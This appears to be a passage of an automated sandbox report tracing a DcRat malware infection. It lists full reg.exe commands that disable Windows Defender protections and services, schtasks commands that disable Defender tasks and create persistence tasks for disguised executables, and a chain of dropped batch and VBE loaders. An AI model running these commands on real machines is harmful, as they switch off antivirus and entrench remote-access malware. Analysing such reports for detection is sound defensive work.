C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:1224
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:5300
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:2632
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:3692
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:4920
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:1472
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:5852
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:5780
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:3776
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:5440
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:1260
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:4020
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:1660
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:4420
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3736
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1944
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1936
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:5172
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2348
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3784
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:4348
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Windows\ja-JP\msedge.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5164
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 5 /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\services.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2652
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\it-IT\msedge.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5532
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5384
-
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"1⤵
- Checks computer location settings
PID:4816 -
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:3996 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"3⤵
- Checks computer location settings
PID:2464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "4⤵PID:5580
-
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wzSW7E5aas.bat"6⤵PID:4520
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:3620
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6140 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pakqiPPahT.bat"8⤵PID:5364
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:3876
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oqEnL4f5pl.bat"10⤵PID:4656
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:211⤵PID:4116
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kbrh69MYEy.bat"12⤵PID:5352
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:213⤵PID:6008
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gyyX5OxKdc.bat"14⤵PID:4772
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:215⤵PID:5152
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3608 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IxigaWiN4Z.bat"16⤵PID:3156
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:217⤵PID:5852
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"17⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5888 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"18⤵PID:1720
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:219⤵PID:1516
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"19⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5720 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3B2OAH3dio.bat"20⤵PID:6100
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:221⤵PID:2728
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"21⤵PID:680
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TK13bru719.bat"22⤵PID:3996
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:223⤵PID:5212
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"23⤵PID:5364
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n9GQh003RW.bat"24⤵PID:5044
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:225⤵PID:1732
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"25⤵PID:3544
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QLJ4q7S46F.bat"26⤵PID:3408
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:227⤵PID:2188
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"27⤵PID:4972
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"28⤵PID:5684
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:229⤵PID:6084
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"29⤵PID:4016
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yyRUJOSyqo.bat"30⤵PID:1640
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:231⤵PID:5580
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"31⤵PID:5968
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\U04fYIssV3.bat"32⤵PID:4632
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:233⤵PID:2684
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"33⤵PID:3236
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TiDn8Em9ri.bat"34⤵PID:2304
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:235⤵PID:2288
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"35⤵PID:4804
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1lJXnITmE.bat"36⤵PID:5828
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:237⤵PID:3496
-
-
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"37⤵PID:2296
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\J6RTVEKunr.bat"38⤵PID:1000
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:239⤵PID:5204
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "2⤵PID:2716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "2⤵PID:2516
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "2⤵PID:3492
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5184
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:3968
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:4456
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:2684
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3896
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1828
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1092
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1900
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2660
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:5936
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:5168
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:5880
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:5924
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2524
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:5088
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:6112
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:2024
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:5276
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:2652
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:5044
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:3212
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:4352
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:5788
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:5368
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:5772
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3324
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:5504
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1928
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:5524
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:5348
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4344
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4576
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:6108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5072
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5684
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
